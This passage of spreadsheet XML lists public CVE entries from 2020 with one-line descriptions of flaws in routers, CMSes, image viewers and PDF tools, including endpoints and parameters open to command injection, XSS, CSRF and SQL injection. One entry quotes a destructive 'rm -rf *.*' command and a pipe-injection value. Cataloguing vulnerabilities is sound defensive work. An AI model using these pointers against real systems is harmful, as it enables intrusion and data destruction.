    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000007d7f.</t>
  </si>
  <si>
    <t>CVE-2020-23560</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x000000000001bcab.</t>
  </si>
  <si>
    <t>CVE-2020-23561</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000005722.</t>
  </si>
  <si>
    <t>CVE-2020-23562</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x000000000000aefe.</t>
  </si>
  <si>
    <t>CVE-2020-23563</t>
  </si>
  <si>
    <t>IrfanView 4.54 allows a user-mode write access violation starting at FORMATS!ShowPlugInSaveOptions_W+0x0000000000002cba.</t>
  </si>
  <si>
    <t>CVE-2020-23565</t>
  </si>
  <si>
    <t>Irfanview v4.53 allows attackers to execute arbitrary code via a crafted JPEG 2000 file. Related to a "Data from Faulting Address controls Branch Selection starting at JPEG2000!ShowPlugInSaveOptions_W+0x0000000000032850".</t>
  </si>
  <si>
    <t>CVE-2020-23566</t>
  </si>
  <si>
    <t>Irfanview v4.53 was discovered to contain an infinity loop via JPEG2000!ShowPlugInSaveOptions_W+0x1ecd8.</t>
  </si>
  <si>
    <t>CVE-2020-23567</t>
  </si>
  <si>
    <t>Irfanview v4.53 allows attackers to to cause a denial of service (DoS) via a crafted JPEG 2000 file. Related to "Integer Divide By Zero starting at JPEG2000!ShowPlugInSaveOptions_W+0x00000000000082ea"</t>
  </si>
  <si>
    <t>CVE-2020-23572</t>
  </si>
  <si>
    <t>BEESCMS v4.0 was discovered to contain an arbitrary file upload vulnerability via the component /admin/upload.php. This vulnerability allows attackers to execute arbitrary code via a crafted image file.</t>
  </si>
  <si>
    <t>CVE-2020-23574</t>
  </si>
  <si>
    <t>When uploading a file in Sysax Multi Server 6.90, an authenticated user can modify the filename="" parameter in the uploadfile_name1.htm form to a length of 368 or more bytes. This will create a buffer overflow condition, causing the application to crash.</t>
  </si>
  <si>
    <t>CVE-2020-23575</t>
  </si>
  <si>
    <t>A directory traversal vulnerability exists in Kyocera Printer d-COPIA253MF plus. Successful exploitation of this vulnerability could allow an attacker to retrieve or view arbitrary files from the affected server.</t>
  </si>
  <si>
    <t>CVE-2020-23576</t>
  </si>
  <si>
    <t>Laborator Neon dashboard v3 is affected by stored Cross Site Scripting (XSS) via the chat tab.</t>
  </si>
  <si>
    <t>CVE-2020-23580</t>
  </si>
  <si>
    <t>Remote Code Execution vulnerability in PbootCMS 2.0.8 in the message board.</t>
  </si>
  <si>
    <t>CVE-2020-23582</t>
  </si>
  <si>
    <t>A vulnerability in the "/admin/wlmultipleap.asp" of optilink OP-XT71000N version: V2.2 could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to create Multiple WLAN BSSID.</t>
  </si>
  <si>
    <t>CVE-2020-23583</t>
  </si>
  <si>
    <t>OPTILINK OP-XT71000N V2.2 is vulnerable to Remote Code Execution. The issue occurs when the attacker sends an arbitrary code on "/diag_ping_admin.asp" to "PingTest" interface that leads to COMMAND EXECUTION. An attacker can successfully trigger the COMMAND and can compromise full system.</t>
  </si>
  <si>
    <t>CVE-2020-23584</t>
  </si>
  <si>
    <t>Unauthenticated remote code execution in OPTILINK OP-XT71000N, Hardware Version: V2.2 occurs when the attacker passes arbitrary commands with IP-ADDRESS using " | " to execute commands on " /diag_tracert_admin.asp " in the "PingTest" parameter that leads to command execution.</t>
  </si>
  <si>
    <t>CVE-2020-23585</t>
  </si>
  <si>
    <t>A remote attacker can conduct a cross-site request forgery (CSRF) attack on OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028. The vulnerability is due to insufficient CSRF protections for the "mgm_config_file.asp" because of which attacker can create a crafted "csrf form" which sends " malicious xml data" to "/boaform/admin/formMgmConfigUpload". the exploit allows attacker to "gain full privileges" and to "fully compromise of router &amp; network".</t>
  </si>
  <si>
    <t>CVE-2020-23586</t>
  </si>
  <si>
    <t>A vulnerability found in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Add Network Traffic Control Type Rule.</t>
  </si>
  <si>
    <t>CVE-2020-23587</t>
  </si>
  <si>
    <t>A vulnerability found in the OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to men in the middle attack by adding New Routes in RoutingConfiguration on " /routing.asp ".</t>
  </si>
  <si>
    <t>CVE-2020-23588</t>
  </si>
  <si>
    <t>A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to "Enable or Disable Ports" and to "Change port number" through " /rmtacc.asp ".</t>
  </si>
  <si>
    <t>CVE-2020-23589</t>
  </si>
  <si>
    <t>A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to cause a Denial of Service by Rebooting the router through " /mgm_dev_reboot.asp."</t>
  </si>
  <si>
    <t>CVE-2020-23590</t>
  </si>
  <si>
    <t>A vulnerability in Optilink OP-XT71000N Hardware version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated remote attacker to conduct a cross-site request forgery (CSRF) attack to change the Password for "WLAN SSID" through "wlwpa.asp".</t>
  </si>
  <si>
    <t>CVE-2020-23591</t>
  </si>
  <si>
    <t>A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an attacker to upload arbitrary files through " /mgm_dev_upgrade.asp " which can "delete every file for Denial of Service (using 'rm -rf *.*' in the code), reverse connection (using '.asp' webshell), backdoor.</t>
  </si>
  <si>
    <t>CVE-2020-23592</t>
  </si>
  <si>
    <t>A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2 , Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to Reset ONU to Factory Default through ' /mgm_dev_reset.asp.' Resetting to default leads to Escalation of Privileges by logging-in with default credentials.</t>
  </si>
  <si>
    <t>CVE-2020-23593</t>
  </si>
  <si>
    <t>A vulnerability in OPTILINK OP-XT71000N Hardware Version: V2.2, Firmware Version: OP_V3.3.1-191028 allows an unauthenticated, remote attacker to conduct a cross site request forgery (CSRF) attack to enable syslog mode through ' /mgm_log_cfg.asp.' The system starts to log events, 'Remote' mode or 'Both' mode on "Syslog -- Configuration page" logs events and sends to remote syslog server IP and Port.</t>
  </si>
  <si>
    <t>CVE-2020-23617</t>
  </si>
  <si>
    <t>A cross site scripting (XSS) vulnerability in the error page of Totolink N200RE and N100RE Routers 2.0 allows attackers to execute arbitrary web scripts or HTML via SCRIPT element.</t>
  </si>
  <si>
    <t>CVE-2020-23618</t>
  </si>
  <si>
    <t>A reflected cross site scripting (XSS) vulnerability in Xtend Voice Logger 1.0 allows attackers to execute arbitrary web scripts or HTML, via the path of the error page.</t>
  </si>
  <si>
    <t>CVE-2020-23620</t>
  </si>
  <si>
    <t>The Java Remote Management Interface of all versions of Orlansoft ERP was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.</t>
  </si>
  <si>
    <t>CVE-2020-23621</t>
  </si>
  <si>
    <t>The Java Remote Management Interface of all versions of SVI MS Management System was discovered to contain a vulnerability due to insecure deserialization of user-supplied content, which can allow attackers to execute arbitrary code via a crafted serialized Java object.</t>
  </si>
  <si>
    <t>CVE-2020-23622</t>
  </si>
  <si>
    <t>** UNSUPPORTED WHEN ASSIGNED ** An issue in the UPnP protocol in 4thline cling 2.0.0 through 2.1.2 allows remote attackers to cause a denial of service via an unchecked CALLBACK parameter in the request header.</t>
  </si>
  <si>
    <t>CVE-2020-23630</t>
  </si>
  <si>
    <t>A blind SQL injection vulnerability exists in zzcms ver201910 based on time (cookie injection).</t>
  </si>
  <si>
    <t>CVE-2020-23631</t>
  </si>
  <si>
    <t>Cross-site request forgery (CSRF) in admin/global/manage.php in WDJA CMS 1.5 allows remote attackers to conduct cross-site scripting (XSS) attacks via the tongji parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23639</t>
  </si>
  <si>
    <t>A command injection vulnerability exists in Moxa Inc VPort 461 Series Firmware Version 3.4 or lower that could allow a remote attacker to execute arbitrary commands in Moxa's VPort 461 Series Industrial Video Servers.</t>
  </si>
  <si>
    <t>CVE-2020-23643</t>
  </si>
  <si>
    <t>XSS exists in JIZHICMS 1.7.1 via index.php/Wechat/checkWeixin?signature=1&amp;echostr={XSS] to Home/c/WechatController.php.</t>
  </si>
  <si>
    <t>CVE-2020-23644</t>
  </si>
  <si>
    <t>XSS exists in JIZHICMS 1.7.1 via index.php/Error/index?msg={XSS] to Home/c/ErrorController.php.</t>
  </si>
  <si>
    <t>CVE-2020-23648</t>
  </si>
  <si>
    <t>Asus RT-N12E 2.0.0.39 is affected by an incorrect access control vulnerability. Through system.asp / start_apply.htm, an attacker can change the administrator password without any authentication.</t>
  </si>
  <si>
    <t>CVE-2020-23653</t>
  </si>
  <si>
    <t>An insecure unserialize vulnerability was discovered in ThinkAdmin versions 4.x through 6.x in app/admin/controller/api/Update.php and app/wechat/controller/api/Push.php, which may lead to arbitrary remote code execution.</t>
  </si>
  <si>
    <t>CVE-2020-23654</t>
  </si>
  <si>
    <t>NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) via the module "Shop."</t>
  </si>
  <si>
    <t>CVE-2020-23655</t>
  </si>
  <si>
    <t>NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Configuration."</t>
  </si>
  <si>
    <t>CVE-2020-23656</t>
  </si>
  <si>
    <t>NavigateCMS 2.9 is affected by Cross Site Scripting (XSS) on module "Content."</t>
  </si>
  <si>
    <t>CVE-2020-23657</t>
  </si>
  <si>
    <t>CVE-2020-23658</t>
  </si>
  <si>
    <t>PHP-Fusion 9.03.60 is affected by Cross Site Scripting (XSS) via infusions/member_poll_panel/poll_admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-23659</t>
  </si>
  <si>
    <t>WebPort-v1.19.17121 is affected by Cross Site Scripting (XSS) on the "connections" feature.</t>
  </si>
  <si>
    <t>CVE-2020-23660</t>
  </si>
  <si>
    <t>webTareas v2.1 is affected by Cross Site Scripting (XSS) on "Search."</t>
  </si>
  <si>
    <t>CVE-2020-23679</t>
  </si>
  <si>
    <t>Buffer overflow vulnerability in Renleilei1992 Linux_Network_Project 1.0, allows attackers to execute arbitrary code, via the password field.</t>
  </si>
  <si>
    <t>CVE-2020-23680</t>
  </si>
  <si>
    <t>An issue was discovered in function StartPage in text2pdf.c in pdfcorner text2pdf 1.1, allows attackers to cause denial of service or possibly other undisclosed impacts.</t>
  </si>
  <si>
    <t>CVE-2020-23685</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in 188Jianzhan v2.1.0, allows attackers to execute arbitrary code and gain escalated privileges, via the username parameter to login.php.</t>
  </si>
  <si>
    <t>CVE-2020-23686</t>
  </si>
  <si>
    <t>Cross site request forgery (CSRF) vulnerability in AyaCMS 3.1.2 allows attackers to change an administrators password or other unspecified impacts.</t>
  </si>
  <si>
    <t>CVE-2020-23689</t>
  </si>
  <si>
    <t>In YFCMF v2.3.1, there is a stored XSS vulnerability in the comments section of the news page.</t>
  </si>
  <si>
    <t>CVE-2020-23691</t>
  </si>
  <si>
    <t>YFCMF v2.3.1 has a Remote Command Execution (RCE) vulnerability in the index.php.</t>
  </si>
  <si>
    <t>CVE-2020-23697</t>
  </si>
  <si>
    <t>Cross Site Scripting vulnerabilty in Monstra CMS 3.0.4 via the page feature in admin/index.php.</t>
  </si>
  <si>
    <t>CVE-2020-23700</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in LavaLite-CMS 5.8.0 via the Menu Links feature.</t>
  </si>
  <si>
    <t>CVE-2020-23702</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in PHP-Fusion 9.03.60 via 'New Shout' in /infusions/shoutbox_panel/shoutbox_admin.php.</t>
  </si>
  <si>
    <t>CVE-2020-23705</t>
  </si>
  <si>
    <t>A global buffer overflow vulnerability in jfif_encode at jfif.c:701 of ffjpeg through 2020-06-22 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.</t>
  </si>
  <si>
    <t>CVE-2020-23706</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability in the function ok_jpg_decode_block_subsequent_scan() ok_jpg.c:1102 of ok-file-formats through 2020-06-26 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.</t>
  </si>
  <si>
    <t>CVE-2020-23707</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability in the function ok_jpg_decode_block_progressive() at ok_jpg.c:1054 of ok-file-formats through 2020-06-26 allows attackers to cause a Denial of Service (DOS) via a crafted jpeg file.</t>
  </si>
  <si>
    <t>CVE-2020-23710</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulneraiblity in LimeSurvey 4.2.5 on textbox via the Notifications &amp; data feature.</t>
  </si>
  <si>
    <t>CVE-2020-23711</t>
  </si>
  <si>
    <t>SQL Injection vulnerability in NavigateCMS 2.9 via the URL encoded GET input category in navigate.php.</t>
  </si>
  <si>
    <t>CVE-2020-23715</t>
  </si>
  <si>
    <t>Directory Traversal vulnerability in Webport CMS 1.19.10.17121 via the file parameter to file/download.</t>
  </si>
  <si>
    <t>CVE-2020-23718</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) vulnerability in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the route parameter to index.php.</t>
  </si>
  <si>
    <t>CVE-2020-23719</t>
  </si>
  <si>
    <t>Cross site scripting (XSS) vulnerability in application/controllers/AdminController.php in xujinliang zibbs 1.0, allows attackers to execute arbitrary code via the bbsmeta parameter.</t>
  </si>
  <si>
    <t>CVE-2020-23721</t>
  </si>
  <si>
    <t>An issue was discovered in FUEL CMS V1.4.7. An attacker can use a XSS payload and bypass a filter via /fuelCM/fuel/pages/edit/1?lang=english.</t>
  </si>
  <si>
    <t>CVE-2020-23722</t>
  </si>
  <si>
    <t>An issue was discovered in FUEL CMS 1.4.7. There is a escalation of privilege vulnerability to obtain super admin privilege via the "id" and "fuel_id" parameters.</t>
  </si>
  <si>
    <t>CVE-2020-23726</t>
  </si>
  <si>
    <t>There is a local denial of service vulnerability in Wise Care 365 5.5.4, attackers can cause computer crash (BSOD).</t>
  </si>
  <si>
    <t>CVE-2020-23727</t>
  </si>
  <si>
    <t>There is a local denial of service vulnerability in the Antiy Zhijia Terminal Defense System 5.0.2.10121559 and an attacker can cause a computer crash (BSOD).</t>
  </si>
  <si>
    <t>CVE-2020-23735</t>
  </si>
  <si>
    <t>In Saibo Cyber Game Accelerator 3.7.9 there is a local privilege escalation vulnerability. Attackers can use the constructed program to increase user privileges</t>
  </si>
  <si>
    <t>CVE-2020-23736</t>
  </si>
  <si>
    <t>There is a local denial of service vulnerability in DaDa accelerator 5.6.19.816,, attackers can use constructed programs to cause computer crashes (BSOD).</t>
  </si>
  <si>
    <t>CVE-2020-23738</t>
  </si>
  <si>
    <t>There is a local denial of service vulnerability in Advanced SystemCare 13 PRO 13.5.0.174. Attackers can use a constructed program to cause a computer crash (BSOD)</t>
  </si>
  <si>
    <t>CVE-2020-23740</t>
  </si>
  <si>
    <t>In DriverGenius 9.61.5480.28 there is a local privilege escalation vulnerability in the driver wizard, attackers can use constructed programs to increase user privileges.</t>
  </si>
  <si>
    <t>CVE-2020-23741</t>
  </si>
  <si>
    <t>In AnyView (network police) network monitoring software 4.6.0.1, there is a local denial of service vulnerability in AnyView, attackers can use a constructed program to cause a computer crash (BSOD).</t>
  </si>
  <si>
    <t>CVE-2020-23754</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in infusions/member_poll_panel/poll_admin.php in PHP-Fusion 9.03.50, allows attackers to execute arbitrary code, via the polls feature.</t>
  </si>
  <si>
    <t>CVE-2020-23761</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in subrion CMS Version &lt;= 4.2.1 allows remote attackers to execute arbitrary web script via the "payment gateway" column on transactions tab.</t>
  </si>
  <si>
    <t>CVE-2020-23762</t>
  </si>
  <si>
    <t>Cross Site Scripting (XSS) vulnerability in the Larsens Calender plugin Version &lt;= 1.2 for WordPress allows remote attackers to execute arbitrary web script via the "titel" column on the "Eintrage hinzufugen" tab.</t>
  </si>
  <si>
    <t>CVE-2020-23763</t>
  </si>
  <si>
    <t>SQL injection in admin.php in Online Book Store 1.0 allows remote attackers to execute arbitrary SQL commands and bypass authentication.</t>
  </si>
  <si>
    <t>CVE-2020-23765</t>
  </si>
  <si>
    <t>A file upload vulnerability was discovered in the file path /bl-plugins/backup/plugin.php on Bludit version 3.12.0. If an attacker is able to gain Administrator rights they will be able to use unsafe plugins to upload a backup file and control the server.</t>
  </si>
  <si>
    <t>CVE-2020-23766</t>
  </si>
  <si>
    <t>An arbitrary file deletion vulnerability was discovered on htmly v2.7.5 which allows remote attackers to use any absolute path to delete any file in the server should they gain Administrator privileges.</t>
  </si>
  <si>
    <t>CVE-2020-23768</t>
  </si>
  <si>
    <t>An information disclosure vulnerability was discovered in alipay_function.php in the log file of Alibaba payment interface on PHPPYUN prior to version 5.0.1. If exploited, this vulnerability will allow attackers to obtain users' personally identifiable information including e-mail address and telephone numbers.</t>
  </si>
  <si>
    <t>CVE-2020-23774</t>
  </si>
  <si>
    <t>A reflected XSS vulnerability exists in tohtml/convert.php of Winmail 6.5, which can cause JavaScript code to be executed.</t>
  </si>
  <si>
    <t>CVE-2020-23776</t>
  </si>
  <si>
    <t>A SSRF vulnerability exists in Winmail 6.5 in app.php in the key parameter when HTTPS is on. An attacker can use this vulnerability to cause the server to send a request to a specific URL. An attacker can modify the request header 'HOST' value to cause the server to send the request.</t>
  </si>
  <si>
    <t>CVE-2020-23790</t>
  </si>
  <si>
    <t>An Arbitrary File Upload vulnerability was discovered in the Golo Laravel theme v 1.1.5.</t>
  </si>
  <si>
    <t>CVE-2020-23811</t>
  </si>
  <si>
    <t>xxl-job 2.2.0 allows Information Disclosure of username, model, and password via job/admin/controller/UserController.java.</t>
  </si>
  <si>
    <t>CVE-2020-23814</t>
  </si>
  <si>
    <t>Multiple cross-site scripting (XSS) vulnerabilities in xxl-job v2.2.0 allow remote attackers to inject arbitrary web script or HTML via (1) AppName and (2)AddressList parameter in JobGroupController.java file.</t>
  </si>
  <si>
    <t>CVE-2020-23824</t>
  </si>
  <si>
    <t>ArGo Soft Mail Server 1.8.8.9 is affected by Cross Site Request Forgery (CSRF) for perform remote arbitrary code execution. The component is the Administration dashboard. When using admin/user credentials, if the admin/user admin opens a website with the malicious page that will run the CSRF.</t>
  </si>
  <si>
    <t>CVE-2020-23826</t>
  </si>
  <si>
    <t>** DISPUTED ** The Yale WIPC-303W 2.21 through 2.31 camera is vulnerable to remote command execution (RCE) through command injection via the HTTP API. NOTE: This may be a duplicate of CVE-2020-10176 .</t>
  </si>
  <si>
    <t>CVE-2020-23828</t>
  </si>
  <si>
    <t>A File Upload vulnerability in SourceCodester Online Course Registration v1.0 allows remote attackers to achieve Remote Code Execution (RCE) on the hosting webserver by uploading a crafted PHP web-shell that bypasses the image upload filters. An attack uses /Online%20Course%20Registration/my-profile.php with the POST parameter photo.</t>
  </si>
  <si>
    <t>CVE-2020-23829</t>
  </si>
  <si>
    <t>interface/new/new_comprehensive_save.php in LibreHealth EHR 2.0.0 suffers from an authenticated file upload vulnerability, allowing remote attackers to achieve remote code execution (RCE) on the hosting webserver by uploading a maliciously crafted image.</t>
  </si>
  <si>
    <t>CVE-2020-23830</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability in changeUsername.php in SourceCodester Stock Management System v1.0 allows remote attackers to deny future logins by changing an authenticated victim's username when they visit a third-party site.</t>
  </si>
  <si>
    <t>CVE-2020-23831</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting (XSS) vulnerability in the index.php login-portal webpage of SourceCodester Stock Management System v1.0 allows remote attackers to harvest login credentials and session cookies when an unauthenticated victim clicks on a malicious URL and enters credentials.</t>
  </si>
  <si>
    <t>CVE-2020-23832</t>
  </si>
  <si>
    <t>A Persistent Cross-Site Scripting (XSS) vulnerability in message_admin.php in Projectworlds Car Rental Management System v1.0 allows unauthenticated remote attackers to harvest an admin login session cookie and steal an admin session upon an admin login.</t>
  </si>
  <si>
    <t>CVE-2020-23833</t>
  </si>
  <si>
    <t>Projectworlds House Rental v1.0 suffers from an unauthenticated SQL Injection vulnerability, allowing remote attackers to execute arbitrary code on the hosting webserver via a malicious index.php POST request.</t>
  </si>
  <si>
    <t>CVE-2020-23834</t>
  </si>
  <si>
    <t>Insecure Service File Permissions in the bd service in Real Time Logic BarracudaDrive v6.5 allow local attackers to escalate privileges to admin by replacing the %SYSTEMDRIVE%\bd\bd.exe file. When the computer next starts, the new bd.exe will be run as LocalSystem.</t>
  </si>
  <si>
    <t>CVE-2020-23835</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting (XSS) vulnerability in the index.php login-portal webpage of SourceCodester Tailor Management System v1.0 allows remote attackers to harvest keys pressed by an unauthenticated victim who clicks on a malicious URL and begins typing.</t>
  </si>
  <si>
    <t>CVE-2020-23836</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability in edit_user.php in OSWAPP Warehouse Inventory System (aka OSWA-INV) through 2020-08-10 allows remote attackers to change the admin's password after an authenticated admin visits a third-party site.</t>
  </si>
  <si>
    <t>CVE-2020-23837</t>
  </si>
  <si>
    <t>A Cross-Site Request Forgery (CSRF) vulnerability in the Multi User plugin 1.8.2 for GetSimple CMS allows remote attackers to add admin (or other) users after an authenticated admin visits a third-party site or clicks on a URL.</t>
  </si>
  <si>
    <t>CVE-2020-23839</t>
  </si>
  <si>
    <t>A Reflected Cross-Site Scripting (XSS) vulnerability in GetSimple CMS v3.3.16, in the admin/index.php login portal webpage, allows remote attackers to execute JavaScript code in the client's browser and harvest login credentials after a client clicks a link, enters credentials, and submits the login form.</t>
  </si>
  <si>
    <t>CVE-2020-23849</t>
  </si>
  <si>
    <t>Stored XSS was discovered in the tree mode of jsoneditor before 9.0.2 through injecting and executing JavaScript.</t>
  </si>
  <si>
    <t>CVE-2020-23851</t>
  </si>
  <si>
    <t>A stack-based buffer overflow vulnerability exists in ffjpeg through 2020-07-02 in the jfif_decode(void *ctxt, BMP *pb) function at ffjpeg/src/jfif.c:513:28, which could cause a denial of service by submitting a malicious jpeg image.</t>
  </si>
  <si>
    <t>CVE-2020-23852</t>
  </si>
  <si>
    <t>A heap based buffer overflow vulnerability exists in ffjpeg through 2020-07-02 in the jfif_decode(void *ctxt, BMP *pb) function at ffjpeg/src/jfif.c (line 544 &amp; line 545), which could cause a denial of service by submitting a malicious jpeg image.</t>
  </si>
  <si>
    <t>CVE-2020-23856</t>
  </si>
  <si>
    <t>Use-after-Free vulnerability in cflow 1.6 in the void call(char *name, int line) function at src/parser.c, which could cause a denial of service via the pointer variable caller-&gt;callee.</t>
  </si>
  <si>
    <t>CVE-2020-23861</t>
  </si>
  <si>
    <t>A heap-based buffer overflow vulnerability exists in LibreDWG 0.10.1 via the read_system_page function at libredwg-0.10.1/src/decode_r2007.c:666:5, which causes a denial of service by submitting a dwg file.</t>
  </si>
  <si>
    <t>CVE-2020-23864</t>
  </si>
  <si>
    <t>An issue exits in IOBit Malware Fighter version 8.0.2.547. Local escalation of privileges is possible by dropping a malicious DLL file into the WindowsApps folder.</t>
  </si>
  <si>
    <t>CVE-2020-23868</t>
  </si>
  <si>
    <t>NeDi 1.9C allows inc/rt-popup.php d XSS.</t>
  </si>
  <si>
    <t>CVE-2020-23872</t>
  </si>
  <si>
    <t>A NULL pointer dereference in the function TextPage::restoreState of pdf2xml v2.0 allows attackers to cause a denial of service (DoS).</t>
  </si>
  <si>
    <t>CVE-2020-23873</t>
  </si>
  <si>
    <t>pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::dump.</t>
  </si>
  <si>
    <t>CVE-2020-23874</t>
  </si>
  <si>
    <t>pdf2xml v2.0 was discovered to contain a heap-buffer overflow in the function TextPage::addAttributsNode.</t>
  </si>
  <si>
    <t>CVE-2020-23876</t>
  </si>
  <si>
    <t>pdf2xml v2.0 was discovered to contain a memory leak in the function TextPage::testLinkedText.</t>
  </si>
  <si>
    <t>CVE-2020-23877</t>
  </si>
  <si>
    <t>pdf2xml v2.0 was discovered to contain a stack buffer overflow in the component getObjectStream.</t>
  </si>
  <si>
    <t>CVE-2020-23878</t>
  </si>
  <si>
    <t>pdf2json v0.71 was discovered to contain a stack buffer overflow in the component XRef::fetch.</t>
  </si>
  <si>
    <t>CVE-2020-23879</t>
  </si>
  <si>
    <t>pdf2json v0.71 was discovered to contain a NULL pointer dereference in the component ObjectStream::getObject.</t>
  </si>
  <si>
    <t>CVE-2020-23884</t>
  </si>
  <si>
    <t>A buffer overflow in Nomacs v3.15.0 allows attackers to cause a denial of service (DoS) via a crafted MNG file.</t>
  </si>
  <si>
    <t>CVE-2020-23886</t>
  </si>
  <si>
    <t>XnView MP v0.96.4 was discovered to contain a heap overflow which allows attackers to cause a denial of service (DoS) via a crafted pict file. Related to a User Mode Write AV starting at ntdll!RtlpLowFragHeapFree.</t>
  </si>
  <si>
    <t>CVE-2020-23887</t>
  </si>
  <si>
    <t>XnView MP v0.96.4 was discovered to contain a heap overflow which allows attackers to cause a denial of service (DoS) via a crafted ico file. Related to a Read Access Violation starting at USER32!SmartStretchDIBits+0x33.</t>
  </si>
  <si>
    <t>CVE-2020-23888</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor!TMethodImplementationIntercept+0x53f6c3 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted psd file.</t>
  </si>
  <si>
    <t>CVE-2020-23889</t>
  </si>
  <si>
    <t>A User Mode Write AV starting at Editor!TMethodImplementationIntercept+0x4189c6 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted ico file.</t>
  </si>
  <si>
    <t>CVE-2020-23890</t>
  </si>
  <si>
    <t>A buffer overflow in WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted JPG file. Related to Data from Faulting Address is used as one or more arguments in a subsequent Function Call starting at JPGCodec+0x753648.</t>
  </si>
  <si>
    <t>CVE-2020-23891</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x5cd7 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tiff file.</t>
  </si>
  <si>
    <t>CVE-2020-23893</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor!TMethodImplementationIntercept+0x3c3682 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tiff file.</t>
  </si>
  <si>
    <t>CVE-2020-23894</t>
  </si>
  <si>
    <t>A User Mode Write AV in ntdll!RtlpCoalesceFreeBlocks+0x268 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tiff file.</t>
  </si>
  <si>
    <t>CVE-2020-23895</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x76af of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tiff file.</t>
  </si>
  <si>
    <t>CVE-2020-23896</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x576b of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tiff file.</t>
  </si>
  <si>
    <t>CVE-2020-23897</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor!TMethodImplementationIntercept+0x54dcec of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file.</t>
  </si>
  <si>
    <t>CVE-2020-23898</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x5ea2 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file.</t>
  </si>
  <si>
    <t>CVE-2020-23899</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x5f91 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file.</t>
  </si>
  <si>
    <t>CVE-2020-23900</t>
  </si>
  <si>
    <t>A buffer overflow in WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file. Related to Data from Faulting Address controls Code Flow starting at Editor!TMethodImplementationIntercept+0x57a3b.</t>
  </si>
  <si>
    <t>CVE-2020-23901</t>
  </si>
  <si>
    <t>A User Mode Write AV in Editor+0x5d15 of WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file.</t>
  </si>
  <si>
    <t>CVE-2020-23902</t>
  </si>
  <si>
    <t>A buffer overflow in WildBit Viewer v6.6 allows attackers to cause a denial of service (DoS) via a crafted tga file. Related to Data from Faulting Address may be used as a return value starting at Editor!TMethodImplementationIntercept+0x528a3.</t>
  </si>
  <si>
    <t>CVE-2020-23903</t>
  </si>
  <si>
    <t>A Divide by Zero vulnerability in the function static int read_samples of Speex v1.2 allows attackers to cause a denial of service (DoS) via a crafted WAV file.</t>
  </si>
  <si>
    <t>CVE-2020-23904</t>
  </si>
  <si>
